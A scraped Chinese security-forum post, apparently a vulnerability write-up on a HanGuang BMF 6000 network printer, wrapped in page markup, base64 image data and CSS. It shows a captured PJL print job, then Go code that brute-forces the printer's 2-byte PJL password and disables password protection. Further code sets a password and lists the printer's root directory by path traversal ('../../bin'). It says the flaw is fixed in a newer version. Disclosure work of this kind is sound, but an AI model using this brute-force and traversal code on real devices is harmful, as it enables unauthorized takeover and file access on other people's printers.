FWoa3hgfTbptiWrZ4Qz0Do0c1UF2f9KzsiTpOHmxU3ZnyY0fcjKXSKUf1pVlmQe2cDRJYDheLFeoQ4MPYMjs3Hbx8vgIEdzwpKo1prDxcsG3EwzGUqlU1L9t91OaNy6Mne2y0NXELUfu1X2PHVoVs7HtnRxFhjNlDgBUpBgbGR3vN7u3/SxD351e6Dw+8sqJHhFCrNl3uwdPd4sKE45obWXKxXwZpwiKJiq5YjFxy5F99fzjWgBRpQfPjo0YuXvOEE1huNj45oWxs93WfS0d+1pqRTjWsXCP13ryjQtjPUYZAFwiEUcQaidWYOnKjRnH8MiZSwMdCEwnE6lsJrbkKwy0mGo1klhJZup4/exA3LkcrnBRDH71/Nk3zx5XC5F8GRs8capVkFsP5GLlos8TDMbTqVQUow4eDMuWV9f8VaxSZWqH8TpfH19+AieSafQKIc1QMMKDIACVk59O3LN5UywHG4xGAcJSNMdDDqYXmuaOU+0WtGZVU0l4MFmLkl9bB15nV4fLNvmZI3O21ypV6HQyHk1RMIJCDOlY2+k+0c8DAIByuchF91y3l5ylajWM8wyCoi1UgcupRDQpQKnJmXl3rPCV46MIh0cHTRLeQY1ZesEZOfGwYjQNI49sf+2L7K9LOZwiMJzCaDaXStUO7wKp9uzJPsn9FSYXdG/zGttMEh4g8TCOGoWl5VAFLqcOzfmwPAC81cX5WXeI4TiYKN2bn5va8JGPvTZeDGjrwNEjhvvRHGiGrGIkQdOVXArjxBa9kmVJDnpkCYa21Ihk4kkBSk/OzLuieZHE0C4r/fL2XcTcoz30AoNVOpOMxxEEzeehsUzVoEYcu0GYLBXw2pKFQ6OD5vtOvi9CkvsiFaMacewGEeoRkRdFJR1Dta1KAUDFYhEMcRxL0RTOsBJR/UD9N0O5kEEgaGF+fnkvwXFFDON5NlYm13awh92JY6OBtBgtX52YDxWIVKao1ojcnj2EqWaqAKmmP5ucXtpNMByWz5K5uO/G3Hoep7wFrklB2HwZuJqtmVtwLMOQFJVJ+G7PO8vE4UkEgPacK1emV3M4JTc2jfS1CB40dgR7qOWp/VelNZaDrtuOAM2wqEh5sVP68c1JUtlhlgt4MqW0mivQz/IDLJTr2exHC44qQXMc53Gtza47J6Zn3IlSPrZ7Y8m+vDjz4dJuLh26NTH96cT0tZmlRDQO9ObojqNCM9kSeVAUDItYLrBju+mMEwQBaMwX8K24/TgADF389fsfztk9H16fSOGVDdv
 								<div class=t_attach id=aimg_170632_menu style=position:absolute;z-index:301;opacity:1;left:203.07px;top:924.586px;display:none>
 								 (115.62 KB)
 								</div>
 								<p></p>
 								<p>报文数据内容如下:</p>
 								<pre><code class="language-js hljs javascript">.print
 								.<span class=hljs-number>.88</span> cfA018DESKTOP<span class=hljs-number>-10E6</span>T52
 								.HDESKTOP<span class=hljs-number>-10E6</span>T52
 								Ptest
 								Jnew <span class=hljs-number>2</span>
 								ldfA018DESKTOP<span class=hljs-number>-10E6</span>T52
 								UdfA018DESKTOP<span class=hljs-number>-10E6</span>T52
 								Nnew <span class=hljs-number>2</span>
 								..<span class=hljs-number>.125899906843000</span> dfA018DESKTOP<span class=hljs-number>-10E6</span>T52
 								..%<span class=hljs-number>-12345</span>X@PJL COMMENT HanGuang BMF <span class=hljs-number>6000</span> Series PCL6 <span class=hljs-number>1.23</span><span class=hljs-number>.1</span><span class=hljs-number>.7</span>
 								@PJL JOB DISPLAY=<span class=hljs-string>"new 2"</span>
 								@PJL JOB NAME=<span class=hljs-string>"new 2"</span>
 								@PJL SET JOBATTR=<span class=hljs-string>"DocumentName=new 2"</span>
 								@PJL SET JOBATTR=<span class=hljs-string>"ComputerName=DESKTOP-10E6T52"</span>
 								@PJL SET JOBATTR=<span class=hljs-string>"UserName=xxxx"</span>
 								@PJL SET JOBATTR=<span class=hljs-string>"ReceptionTime=16:29:28 2021/10/27"</span>
 								@PJL SET PAPER=A4
 								@PJL SET ROTATESORT=OFF
 								@PJL SET ORIENTATION=PORTRAIT
 								@PJL SET RESOLUTION=<span class=hljs-number>600</span>
 								@PJL SET MEDIATYPE=AUTOSELECT
 								@PJL SET STAPLE=OFF
 								@PJL SET DUPLEX=OFF
 								@PJL SET HOLD=NORMAL
 								@PJL SET ECONOMODE=OFF
 								@PJL SET AUTHENTICATIONUSERID=<span class=hljs-string>""</span>
 								@PJL SET AUTHENTICATIONPASSWORD=<span class=hljs-string>""</span>
 								@PJL SET AUTHENTICATIONGROUPID=<span class=hljs-string>""</span>
 								@PJL SET AUTHENTICATIONGROUPPW=<span class=hljs-string>""</span>
 								@PJL SET BRIGHTNESS=<span class=hljs-string>"A:0"</span>
 								@PJL SET CONTRAST=<span class=hljs-string>"A:1"</span>
 								@PJL SET TONERDARKNESS=<span class=hljs-number>5</span>
 								@PJL SET QTY=<span class=hljs-number>1</span>
 								@PJL ENTER LANGUAGE=POSTSCRIPT
 								) HP-PCL XL;<span class=hljs-number>3</span>;<span class=hljs-number>0</span>;Comment Copyright(c) <span class=hljs-number>1999</span><span class=hljs-number>-2003</span> Microsoft Corporation
 								.X.X...........A........H...&amp;...(..<span class=hljs-number>.4</span>...Standard.<span class=hljs-string>'...%C.`.`..*u....?...?.+w....j...,{...-x...-|...,{...,{.....y...        c..;.s......B.....        c........MS PCLXLFont 001..O.....P...........
 								...P.
 								BR.....X.X.....P........Q....MS PCLXLFont 001......B.......o....?...?..e....MS PCLXLFont 001..R..........S.....        .4. .4............................p.............................................................................................................................................................................................S.............T.;....Lk..................222.......s..Lk...,{...        c....s......B.....s..Lk....s......B.....s..Lk....s.,....B.....,{....        c....MS PCLXLFont 001..R..........S.......0.%.0.................p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p...........................S.......0.'</span><span class=hljs-number>.0</span>..................<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>.........................................................................................................................................................................................S.........<span class=hljs-number>.1</span>.#<span class=hljs-number>.2</span>......?..........................................<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>....&lt;.........................................................?.........................................................................................&gt;.....................T......Lk.................<span class=hljs-number>.222</span>.......<span class=hljs-number>.1</span>D....MS PCLXLFont <span class=hljs-number>001.</span>.UIB.%<span class=hljs-number>-12345</span>X@PJL EOJ
 								.%<span class=hljs-number>-12345</span>X.</code></pre>
 								<p>通过分析抓取的通信数据报文可知，打印机接收的打印指令遵循 PJL（Printer Job Language）语法格式，该协议用于在终端与打印机间传输作业控制指令及状态查询等信息。</p>
 								<ul>
 								<li>意外情况</li>
 								</ul>
 								<p>之前无意开启安全保护模式，导致无法执行PJL命令，经过查阅资料得知，打印机发送PJL指令之前需要对使用者的身份进行认证。后面发现该认证机制存在被爆破风险，由于认证程序的密钥长度为2字节长度，则可通过爆破方式绕过认证，最终任意执行PJL命令。 </p>
 								<ul>
 								<li>爆破密码</li>
 								</ul>
 								<p>爆破+禁用密码保护</p>
 								<pre><code class=language-golang>func (c *Cli) CrackPass() {
 								        for i := 0; i &lt; 65536; i++ {
 								                PjlPass := fmt.Sprintf("JOB PASSWORD=%d\r\n", i)
 								                CrackPassInfo := START + PjlPass + END
 								                log.Println(CrackPassInfo)
 								                data := []byte(CrackPassInfo)
 								                c.conn.Write(data)
 								                //禁用密码保护
 								                PjlDefaultPass := "DEFAULT PASSWORD=0\r\n"
 								                DefaultPassInfo := START + PjlDefaultPass + END
 								                log.Println(DefaultPassInfo)
 								                data = []byte(DefaultPassInfo)
 								                c.conn.Write(data)
 								        }
 								}</code></pre>
 								<p>如何设置密码？</p>
 								<pre><code class=language-golang>func (c *Cli) SetPassWord() {
 								        log.Println("Start to Set Password!")
 								        InfoId := "@PJL DEFAULT PASSWORD=61220\r\n"
 								        DeviceId := START + InfoId + END
 								        data := []byte(DeviceId)
 								        c.conn.Write(data)
 								        rsp, err := ioutil.ReadAll(c.conn)
 								        if err != nil {
 								                fmt.Println(err.Error())
 								                return
 								        }
 								        fmt.Println(string(rsp))
 								}
 								</code></pre>
 								<h2>4. 漏洞复现</h2>
 								<ul>
 								<li>获取打印机系统根目录</li>
 								</ul>
 								<pre><code class=language-golang>const START = "\033%-12345X@PJL "
 								const END = "\033%-12345X\r\n"
 								func (c *Cli) ListDirectory(path string) {
 								        // ../../bin
 								        log.Println("Start to Query Printer Directory!")
 								        InfoId := fmt.Sprintf("@PJL FSDIRLIST NAME=\"%s\" ENTRY=1 COUNT=1024\r\n", path)
 								        DeviceId := START + InfoId + END
 								        data := []byte(DeviceId)
 								        c.conn.Write(data)
 								        rsp, err := ioutil.ReadAll(c.conn)
 								        if err != nil {
 								                log.Println("Error:", err.Error())
 								                return
 								        }
 								        log.Println("Printer Response: " + string(rsp))
 								}</code></pre>
 								<ul>
 								<li>报文响应</li>
 								</ul>
 								<ol>
 								<li>打印机字符串</li>
 								<li>获取设备ID</li>
 								<li>获取设备根文件系统目录</li>
 								</ol>
 								<p>
 								<span style=position:absolute;display:none id=attach_170631></span>
 								<img src="data:image/png;base64,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
 								<div class=t_attach id=aimg_170631_menu style=position:absolute;z-index:301;opacity:1;left:203.07px;top:3877.66px;display:none>
 								 (132.65 KB)
 								</div>
 								<p></p>
 								<h2>5.漏洞修复</h2>
 								<p>新版本已修复该漏洞</p>
 								<p>自评TCV:2</p></div>
 								</table>
 								</div>
 								</div>
 								</div>
 								</tr>
 								</table>
 								</div>
 								</div>
 								<div id=f_post class="mainbox viewthread" style=display:none!important>
 								<form method=post id=fastpostform action="post.php?action=reply&amp;fid=52&amp;tid=73632&amp;extra=page%3D1&amp;replysubmit=yes&amp;infloat=yes&amp;handlekey=fastpost" style=display:none!important>
 								<table cellspacing=0 cellpadding=0 style=display:none!important>
 								<tbody style=display:none!important><tr style=display:none!important>
 								<td class=postcontent style=display:none!important>
 								<div class=editor_tb style=display:none!important>
 								</div>
 								</td>
 								</tr>
 								</table>
 								</form>
 								</div>
 								</div>
 								<div id=immersive-translate-browser-popup style=color-scheme:initial;forced-color-adjust:initial;mask:initial;math-depth:initial;position:initial;position-anchor:initial;text-size-adjust:initial;appearance:initial;color:initial;font:initial;font-palette:initial;font-synthesis:initial;position-area:initial;text-orientation:initial;text-rendering:initial;text-spacing-trim:initial;-webkit-font-smoothing:initial;-webkit-locale:initial;-webkit-text-orientation:initial;-webkit-writing-mode:initial;writing-mode:initial;zoom:initial;accent-color:initial;place-content:initial;place-items:initial;place-self:initial;alignment-baseline:initial;anchor-name:initial;anchor-scope:initial;animation-composition:initial;animation:initial;app-region:initial;aspect-ratio:initial;backdrop-filter:initial;backface-visibility:initial;background:initial;background-blend-mode:initial;baseline-shift:initial;baseline-source:initial;block-size:initial;border-block:initial;border:initial;border-radius:initial;border-collapse:initial;border-end-end-radius:initial;border-end-start-radius:initial;border-inline:initial;border-start-end-radius:initial;border-start-start-radius:initial;inset:initial;box-decoration-break:initial;box-shadow:initial;box-sizing:initial;break-after:initial;break-before:initial;break-inside:initial;buffered-rendering:initial;caption-side:initial;caret-color:initial;clear:initial;clip:initial;clip-path:initial;clip-rule:initial;color-interpolation:initial;color-interpolation-filters:initial;color-rendering:initial;columns:initial;column-fill:initial;gap:initial;column-rule:initial;column-span:initial;contain:initial;contain-intrinsic-block-size:initial;contain-intrinsic-size:initial;contain-intrinsic-inline-size:initial;container:initial;content:initial;content-visibility:initial;counter-increment:initial;counter-reset:initial;counter-set:initial;cursor:initial;cx:initial;cy:initial;d:initial;display:none!important;dominant-baseline:initial;dynamic-range-limit:initial;empty-cells:initial;field-sizing:initial;fill:initial;fill-opacity:initial;fill-rule:initial;filter:initial;flex:initial;flex-flow:initial;float:initial;flood-color:initial;flood-opacity:initial;grid:initial;grid-area:initial;height:initial;hyphenate-character:initial;hyphenate-limit-chars:initial;hyphens:initial;image-orientation:initial;image-rendering:initial;initial-letter:initial;inline-size:initial;inset-block:initial;inset-inline:initial;interpolate-size:initial;isolation:initial;letter-spacing:initial;lighting-color:initial;line-break:initial;list-style:initial;margin-block:initial;margin:initial;margin-inline:initial;marker:initial;mask-type:initial;math-shift:initial;math-style:initial;max-block-size:initial;max-height:initial;max-inline-size:initial;max-width:initial;min-block-size:initial;min-height:initial;min-inline-size:initial;min-width:initial;mix-blend-mode:initial;object-fit:initial;object-position:initial;object-view-box:initial;offset:initial;opacity:initial;order:initial;orphans:initial;outline:initial;outline-offset:initial;overflow-anchor:initial;overflow-block:initial;overflow-clip-margin:initial;overflow-inline:initial;overflow-wrap:initial;overflow:initial;overlay:initial;overscroll-behavior-block:initial;overscroll-behavior-inline:initial;overscroll-behavior:initial;padding-block:initial;padding:initial;padding-inline:initial;page:initial;page-orientation:initial;paint-order:initial;perspective:initial;perspective-origin:initial;pointer-events:initial;position-try:initial;position-visibility:initial;print-color-adjust:initial;quotes:initial;r:initial;resize:initial;rotate:initial;ruby-align:initial;ruby-position:initial;rx:initial;ry:initial;scale:initial;scroll-behavior:initial;scroll-initial-target:initial;scroll-margin-block:initial;scroll-margin:initial;scroll-margin-inline:initial;scroll-marker-group:initial;scroll-padding-block:initial;scroll-padding:initial;scroll-padding-inline:initial;scroll-snap-align:initial;scroll-snap-stop:initial;scroll-snap-type:initial;scroll-timeline:initial;scrollbar-color:initial;scrollbar-gutter:initia
 								 * Pico.css v1.5.6 (https://picocss.com)
 								 * Copyright 2019-2022 - Licensed under MIT
 								 */#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c